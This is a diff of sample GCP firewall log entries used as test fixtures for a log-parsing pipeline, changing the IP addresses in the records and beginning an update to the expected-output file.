-{"insertId":"18ynfbufer19m1","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":8080,"protocol":6,"src_ip":"192.0.2.200","src_port":42716},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"city":"İzmir","continent":"Asia","country":"tur","region":"İzmir"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T14:32:14.038485761Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T14:32:07.407039908Z"} -{"insertId":"tzddthfsr6fv5","jsonPayload":{"connection":{"dest_ip":"8.8.8.8","dest_port":80,"protocol":6,"src_ip":"10.28.0.16","src_port":46418},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"continent":"America","country":"usa"},"rule_details":{"action":"DENY","destination_range":["8.8.8.0/24"],"direction":"EGRESS","ip_port_info":[{"ip_protocol":"ALL"}],"priority":1000,"reference":"network:default/firewall:adrian-test-1","target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-12T12:41:28.971534988Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-12T12:41:20.972747063Z"} -{"insertId":"1k2b7kefsnhzq7","jsonPayload":{"connection":{"dest_ip":"8.8.8.8","dest_port":80,"protocol":17,"src_ip":"10.28.0.16","src_port":58725},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"continent":"America","country":"usa"},"rule_details":{"action":"DENY","destination_range":["8.8.8.0/24"],"direction":"EGRESS","ip_port_info":[{"ip_protocol":"ALL"}],"priority":1000,"reference":"network:default/firewall:adrian-test-1","target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-12T12:42:33.671883883Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-12T12:42:26.50532921Z"} -{"insertId":"1sdfuwxfk8hq1c","jsonPayload":{"connection":{"dest_ip":"10.42.0.10","dest_port":9200,"protocol":6,"src_ip":"192.0.2.114","src_port":44666},"disposition":"ALLOWED","instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-es","zone":"us-east1-b"},"remote_instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-kibana","zone":"us-east1-b"},"remote_location":{"continent":"America","country":"usa"},"remote_vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"},"rule_details":{"action":"ALLOW","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["9200"]}],"priority":1000,"reference":"network:default/firewall:allow9200","source_range":["0.0.0.0/0"],"target_tag":["allow9200"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T12:54:15.188832255Z","resource":{"labels":{"location":"us-east1-b","project_id":"test-beats","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T12:54:13.531819246Z"} -{"insertId":"1sdfuwxfk8hq1b","jsonPayload":{"connection":{"dest_ip":"10.42.0.10","dest_port":9200,"protocol":6,"src_ip":"192.0.2.114","src_port":44668},"disposition":"ALLOWED","instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-es","zone":"us-east1-b"},"remote_instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-kibana","zone":"us-east1-b"},"remote_location":{"continent":"America","country":"usa"},"remote_vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"},"rule_details":{"action":"ALLOW","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["9200"]}],"priority":1000,"reference":"network:default/firewall:allow9200","source_range":["0.0.0.0/0"],"target_tag":["allow9200"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T12:54:15.188832255Z","resource":{"labels":{"location":"us-east1-b","project_id":"test-beats","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T12:54:13.551617516Z"} -{"insertId":"yot1ojetjdiw","jsonPayload":{"connection":{"dest_ip":"10.42.0.2","dest_port":3389,"protocol":6,"src_ip":"192.0.2.7","src_port":1683},"disposition":"ALLOWED","instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-windows","zone":"us-east1-b"},"remote_location":{"city":"Almelo","continent":"Europe","country":"nld","region":"Overijssel"},"rule_details":{"action":"ALLOW","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["3389"]}],"priority":1000,"reference":"network:windows-isolated/firewall:windows-isolated-allow-rdp","source_range":["0.0.0.0/0"],"target_tag":["allow-rdp"]},"vpc":{"project_id":"test-beats","subnetwork_name":"windows-isolated","vpc_name":"windows-isolated"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T12:54:28.477733837Z","resource":{"labels":{"location":"us-east1-b","project_id":"test-beats","subnetwork_id":"3238409883146034900","subnetwork_name":"windows-isolated"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T12:54:15.771161946Z"} -{"insertId":"5a27u1g22jks9e","jsonPayload":{"connection":{"dest_ip":"10.42.0.10","dest_port":9200,"protocol":6,"src_ip":"192.0.2.114","src_port":45068},"disposition":"ALLOWED","instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-es","zone":"us-east1-b"},"remote_instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-kibana","zone":"us-east1-b"},"remote_location":{"continent":"America","country":"usa"},"remote_vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"},"rule_details":{"action":"ALLOW","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["9200"]}],"priority":1000,"reference":"network:default/firewall:allow9200","source_range":["0.0.0.0/0"],"target_tag":["allow9200"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T12:54:45.189726185Z","resource":{"labels":{"location":"us-east1-b","project_id":"test-beats","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T12:54:35.850729583Z"} -{"insertId":"5a27u1g22jks8t","jsonPayload":{"connection":{"dest_ip":"10.42.0.10","dest_port":9200,"protocol":6,"src_ip":"192.0.2.114","src_port":45062},"disposition":"ALLOWED","instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-es","zone":"us-east1-b"},"remote_instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-kibana","zone":"us-east1-b"},"remote_location":{"continent":"America","country":"usa"},"remote_vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"},"rule_details":{"action":"ALLOW","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["9200"]}],"priority":1000,"reference":"network:default/firewall:allow9200","source_range":["0.0.0.0/0"],"target_tag":["allow9200"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T12:54:45.189726185Z","resource":{"labels":{"location":"us-east1-b","project_id":"test-beats","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T12:54:35.85023465Z"} +{"insertId":"4zuj4nfn4llkb","jsonPayload":{"connection":{"dest_ip":"67.43.156.13","dest_port":53,"protocol":17,"src_ip":"10.128.0.16","src_port":60094},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"continent":"America","country":"usa"},"rule_details":{"action":"DENY","destination_range":["8.8.8.0/24"],"direction":"EGRESS","ip_port_info":[{"ip_protocol":"ALL"}],"priority":1000,"reference":"network:default/firewall:adrian-test-1","target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-12T12:35:24.466374097Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-12T12:35:17.214711274Z"} +{"insertId":"1f21ciqfpfssuo","jsonPayload":{"connection":{"dest_ip":"10.42.0.2","dest_port":3389,"protocol":6,"src_ip":"192.168.2.126","src_port":64853},"disposition":"ALLOWED","instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-windows","zone":"us-east1-b"},"remote_location":{"continent":"Asia","country":"omn"},"rule_details":{"action":"ALLOW","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["3389"]}],"priority":1000,"reference":"network:windows-isolated/firewall:windows-isolated-allow-rdp","source_range":["0.0.0.0/0"],"target_tag":["allow-rdp"]},"vpc":{"project_id":"test-beats","subnetwork_name":"windows-isolated","vpc_name":"windows-isolated"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-10-30T13:52:54.473174731Z","resource":{"labels":{"location":"us-east1-b","project_id":"test-beats","subnetwork_id":"3238409883146034900","subnetwork_name":"windows-isolated"},"type":"gce_subnetwork"},"timestamp":"2019-10-30T13:52:42.191988835Z"} +{"insertId":"8vcfeailjd","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":8080,"protocol":6,"src_ip":"192.168.2.219","src_port":2897},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"city":"Krasnodar","continent":"Europe","country":"rus","region":"Krasnodar Krai"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T12:31:22.738796433Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T12:31:19.421478847Z"} +{"insertId":"1bqgmw9feiabij","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":80,"protocol":6,"src_ip":"192.168.2.14","src_port":61000},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"continent":"Europe","country":"deu"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T12:41:35.727004321Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T12:41:31.079508196Z"} +{"insertId":"1jrxaqbfe48bir","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":80,"protocol":6,"src_ip":"192.168.2.14","src_port":61000},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"continent":"Europe","country":"deu"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T12:41:40.791816098Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T12:41:34.190831607Z"} +{"insertId":"1fw7drlfe2ty27","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":8080,"protocol":6,"src_ip":"192.168.2.151","src_port":62551},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"city":"Berdychiv","continent":"Europe","country":"ukr","region":"Zhytomyr Oblast"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T12:48:47.038820509Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T12:48:41.449552758Z"} +{"insertId":"1yre751fekaxzs","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":8080,"protocol":6,"src_ip":"192.168.2.241","src_port":44542},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"city":"Vicenza","continent":"Europe","country":"ita","region":"Veneto"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T13:10:30.804549999Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T13:10:24.214995318Z"} +{"insertId":"5kanfzfiqepkh","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":80,"protocol":6,"src_ip":"192.168.2.114","src_port":41293},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"city":"Tula","continent":"Europe","country":"rus","region":"Tula Oblast"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T13:35:28.934918322Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T13:35:23.504719962Z"} +{"insertId":"59z0t8fiow9vg","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":80,"protocol":6,"src_ip":"192.168.2.251","src_port":59106},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"city":"Stavropol","continent":"Europe","country":"rus","region":"Stavropol Krai"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T13:36:54.238077643Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T13:36:52.135887769Z"} +{"insertId":"1y7e4yzff816cq","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":80,"protocol":6,"src_ip":"192.168.2.189","src_port":61000},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"city":"Violès","continent":"Europe","country":"fra","region":"Provence-Alpes-Côte d'Azur"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T14:06:26.357446279Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T14:06:16.59353182Z"} +{"insertId":"lx5jlsfggpr0q","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":80,"protocol":6,"src_ip":"192.168.2.189","src_port":61000},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"city":"Violès","continent":"Europe","country":"fra","region":"Provence-Alpes-Côte d'Azur"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T14:06:28.203068653Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T14:06:22.930570324Z"} +{"insertId":"18ynfbufer19m1","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":8080,"protocol":6,"src_ip":"192.168.2.200","src_port":42716},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"city":"İzmir","continent":"Asia","country":"tur","region":"İzmir"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T14:32:14.038485761Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T14:32:07.407039908Z"} +{"insertId":"tzddthfsr6fv5","jsonPayload":{"connection":{"dest_ip":"67.43.156.13","dest_port":80,"protocol":6,"src_ip":"10.28.0.16","src_port":46418},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"continent":"America","country":"usa"},"rule_details":{"action":"DENY","destination_range":["8.8.8.0/24"],"direction":"EGRESS","ip_port_info":[{"ip_protocol":"ALL"}],"priority":1000,"reference":"network:default/firewall:adrian-test-1","target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-12T12:41:28.971534988Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-12T12:41:20.972747063Z"} +{"insertId":"1k2b7kefsnhzq7","jsonPayload":{"connection":{"dest_ip":"67.43.156.13","dest_port":80,"protocol":17,"src_ip":"10.28.0.16","src_port":58725},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"continent":"America","country":"usa"},"rule_details":{"action":"DENY","destination_range":["8.8.8.0/24"],"direction":"EGRESS","ip_port_info":[{"ip_protocol":"ALL"}],"priority":1000,"reference":"network:default/firewall:adrian-test-1","target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-12T12:42:33.671883883Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-12T12:42:26.50532921Z"} +{"insertId":"1sdfuwxfk8hq1c","jsonPayload":{"connection":{"dest_ip":"10.42.0.10","dest_port":9200,"protocol":6,"src_ip":"192.168.2.114","src_port":44666},"disposition":"ALLOWED","instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-es","zone":"us-east1-b"},"remote_instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-kibana","zone":"us-east1-b"},"remote_location":{"continent":"America","country":"usa"},"remote_vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"},"rule_details":{"action":"ALLOW","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["9200"]}],"priority":1000,"reference":"network:default/firewall:allow9200","source_range":["0.0.0.0/0"],"target_tag":["allow9200"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T12:54:15.188832255Z","resource":{"labels":{"location":"us-east1-b","project_id":"test-beats","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T12:54:13.531819246Z"} +{"insertId":"1sdfuwxfk8hq1b","jsonPayload":{"connection":{"dest_ip":"10.42.0.10","dest_port":9200,"protocol":6,"src_ip":"192.168.2.114","src_port":44668},"disposition":"ALLOWED","instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-es","zone":"us-east1-b"},"remote_instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-kibana","zone":"us-east1-b"},"remote_location":{"continent":"America","country":"usa"},"remote_vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"},"rule_details":{"action":"ALLOW","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["9200"]}],"priority":1000,"reference":"network:default/firewall:allow9200","source_range":["0.0.0.0/0"],"target_tag":["allow9200"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T12:54:15.188832255Z","resource":{"labels":{"location":"us-east1-b","project_id":"test-beats","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T12:54:13.551617516Z"} +{"insertId":"yot1ojetjdiw","jsonPayload":{"connection":{"dest_ip":"10.42.0.2","dest_port":3389,"protocol":6,"src_ip":"192.168.2.7","src_port":1683},"disposition":"ALLOWED","instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-windows","zone":"us-east1-b"},"remote_location":{"city":"Almelo","continent":"Europe","country":"nld","region":"Overijssel"},"rule_details":{"action":"ALLOW","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["3389"]}],"priority":1000,"reference":"network:windows-isolated/firewall:windows-isolated-allow-rdp","source_range":["0.0.0.0/0"],"target_tag":["allow-rdp"]},"vpc":{"project_id":"test-beats","subnetwork_name":"windows-isolated","vpc_name":"windows-isolated"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T12:54:28.477733837Z","resource":{"labels":{"location":"us-east1-b","project_id":"test-beats","subnetwork_id":"3238409883146034900","subnetwork_name":"windows-isolated"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T12:54:15.771161946Z"} +{"insertId":"5a27u1g22jks9e","jsonPayload":{"connection":{"dest_ip":"10.42.0.10","dest_port":9200,"protocol":6,"src_ip":"192.168.2.114","src_port":45068},"disposition":"ALLOWED","instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-es","zone":"us-east1-b"},"remote_instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-kibana","zone":"us-east1-b"},"remote_location":{"continent":"America","country":"usa"},"remote_vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"},"rule_details":{"action":"ALLOW","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["9200"]}],"priority":1000,"reference":"network:default/firewall:allow9200","source_range":["0.0.0.0/0"],"target_tag":["allow9200"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T12:54:45.189726185Z","resource":{"labels":{"location":"us-east1-b","project_id":"test-beats","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T12:54:35.850729583Z"} +{"insertId":"5a27u1g22jks8t","jsonPayload":{"connection":{"dest_ip":"10.42.0.10","dest_port":9200,"protocol":6,"src_ip":"192.168.2.114","src_port":45062},"disposition":"ALLOWED","instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-es","zone":"us-east1-b"},"remote_instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-kibana","zone":"us-east1-b"},"remote_location":{"continent":"America","country":"usa"},"remote_vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"},"rule_details":{"action":"ALLOW","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["9200"]}],"priority":1000,"reference":"network:default/firewall:allow9200","source_range":["0.0.0.0/0"],"target_tag":["allow9200"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T12:54:45.189726185Z","resource":{"labels":{"location":"us-east1-b","project_id":"test-beats","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T12:54:35.85023465Z"} {"insertId":"1dobeotg13df9f5","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":80,"protocol":6,"src_ip":"10.42.0.10","src_port":57794},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-es","zone":"us-east1-b"},"remote_vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-06T16:41:45.009675991Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-06T16:41:38.394575419Z"} diff --git a/packages/gcp/data_stream/firewall/_dev/test/pipeline/test-firewall.log-expected.json b/packages/gcp/data_stream/firewall/_dev/test/pipeline/test-firewall.log-expected.json index f992558affc..8448cb23c6b 100644 --- a/packages/gcp/data_stream/firewall/_dev/test/pipeline/test-firewall.log-expected.json +++ b/packages/gcp/data_stream/firewall/_dev/test/pipeline/test-firewall.log-expected.json @@ -96,7 +96,7 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.147348Z", + "ingested": "2021-12-09T13:37:43.705390900Z", "original": 